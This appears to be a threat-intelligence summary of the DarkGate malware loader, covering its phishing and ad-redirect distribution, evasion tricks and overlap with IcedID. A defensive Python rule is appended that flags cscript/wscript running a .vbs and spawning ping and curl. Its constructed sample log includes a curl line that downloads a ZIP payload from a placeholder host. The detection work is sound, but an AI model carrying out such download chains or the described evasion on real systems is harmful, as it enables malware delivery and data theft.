After the Qakbot takedown, distribution of the DarkGate loader increased rapidly. It has been used by financially motivated attackers such as TA577 and ransomware groups (BianLian, Black Basta) to target financial institutions in the US and Europe for follow-on attacks, leading to serious extortion.
The operators establish an initial foothold, deploy information stealers, ransomware and remote access tools, and use legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution in order to maximize profits from data theft and extortion.
Similarities to the IcedID delivery method suggest that the threat actors may be collaborating or sharing their techniques.
DarkGate is malware-as-a-service, advertised since June 2023, that uses multiple evasion techniques such as custom crypters, polymorphism and anti-VM checks to provide remote access, data theft and privilege escalation.
It also leverages LOLBAS (living-off-the-land binaries and scripts) to download a malicious AutoIt script that decrypts the DarkGate payload and injects it into a process, establishing persistence through registry keys and rootkit modules.
Attackers primarily target financial institutions such as BDK, a large German bank, using phishing emails with decoys related to the targeted industry and delivering DarkGate payloads through links embedded in PDF attachments.
The link redirects the victim to a download page hosted on a compromised website.
To evade detection, DarkGate operators employ novel techniques, including abusing DNS TXT records to run malicious Windows commands that download and install the malware.
EclecticIQ analysts compared DarkGate and IcedID and noted common tactics such as obfuscated strings, checking internet connectivity with PING.exe, downloading the payload with CURL.exe, and decoy PDF documents.
They differ in the execution tool (DarkGate: cscript.exe; IcedID: rundll32.exe) and in payload type (DarkGate: VBS script; IcedID: an impersonating DLL).
In the DarkGate distribution, the attackers exploited open redirects in Google's DoubleClick ads using emails containing links disguised as invoices.
Since January 2024, DarkGate has migrated to CAB and MSI formats, potentially evading detection.
DarkGate version 6.1.6 employs DLL sideloading for evasion, where malicious DLLs are loaded into legitimate applications (VLC, iTunesHelper, etc.) through a compromised MSI installer.
The payload then decrypts itself using a key in the fake sqlite3.dll and drops a script to C:\temp; it then decrypts again using another key to launch the final DarkGate payload.
This version also features a new configuration decryption routine that uses XOR encryption to hide C2 server information and other operational parameters, making signature-based detection more difficult.
After gaining an initial foothold, DarkGate (a malware-as-a-service, MaaS) steals information from the victim's device, including the username, CPU information and installed antivirus.
It then runs the VBS script using Living Off the Land Binaries and Scripts (LOLBAS) such as wscript.exe and cscript.exe.
Network traffic analysis can detect suspicious patterns, such as downloads from unusual domains or suspicious curl.exe activity, and YARA rules can detect the final payload on infected devices.
The IOCs include a suspicious user-agent string, a command-and-control (C2) server domain, a payload download URL pointing to a malicious ZIP file, and multiple file hashes; they can be used to identify infected systems, block malicious traffic and improve threat detection.
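The detection idea above (a script host launching a .vbs, then spawning ping.exe for a connectivity check and curl.exe for the download) can be expressed as a process-tree rule. The following is an added example, not code from the article or from EclecticIQ; the log format, host names and the example.invalid domain are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not real telemetry): parent -> child chains.
SAMPLE_EVENTS = [
    "host=ws01 pid=100 ppid=4 image=C:\\Windows\\explorer.exe cmd=explorer.exe",
    "host=ws01 pid=210 ppid=100 image=C:\\Windows\\System32\\cscript.exe cmd=cscript.exe //B C:\\Users\\u\\Downloads\\invoice.vbs",
    "host=ws01 pid=220 ppid=210 image=C:\\Windows\\System32\\PING.EXE cmd=ping -n 1 example.invalid",
    "host=ws01 pid=230 ppid=210 image=C:\\Windows\\System32\\curl.exe cmd=curl -o C:\\temp\\p.zip http://example.invalid/p.zip",
    "host=ws02 pid=300 ppid=4 image=C:\\Windows\\System32\\cmd.exe cmd=cmd.exe",
    "host=ws02 pid=310 ppid=300 image=C:\\Windows\\System32\\curl.exe cmd=curl https://example.invalid/ok",
]

EVENT_RE = re.compile(r"host=(\S+) pid=(\d+) ppid=(\d+) image=(\S+) cmd=(.*)")
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}   # LOLBAS script hosts named in the article
DOWNLOAD_CHAIN = {"ping.exe", "curl.exe"}       # connectivity check + payload download


def parse_events(lines):
    """Parse the constructed log lines into dicts; image is reduced to its lowercase basename."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            host, pid, ppid, image, cmd = m.groups()
            events.append({"host": host, "pid": int(pid), "ppid": int(ppid),
                           "image": image.rsplit("\\", 1)[-1].lower(), "cmd": cmd})
    return events


def detect_darkgate_chain(lines):
    """Return (host, pid, cmdline) for every script host that ran a .vbs and
    whose direct children include both ping.exe and curl.exe."""
    events = parse_events(lines)
    children = defaultdict(list)
    for e in events:
        children[(e["host"], e["ppid"])].append(e)
    alerts = []
    for e in events:
        if e["image"] in SCRIPT_HOSTS and ".vbs" in e["cmd"].lower():
            kids = {c["image"] for c in children[(e["host"], e["pid"])]}
            if DOWNLOAD_CHAIN <= kids:
                alerts.append((e["host"], e["pid"], e["cmd"]))
    return alerts


if __name__ == "__main__":
    for host, pid, cmd in detect_darkgate_chain(SAMPLE_EVENTS):
        print(f"ALERT {host} pid={pid}: {cmd}")
```

A lone curl.exe under cmd.exe (host ws02) is not flagged; the rule keys on the full script-host chain rather than on any single binary.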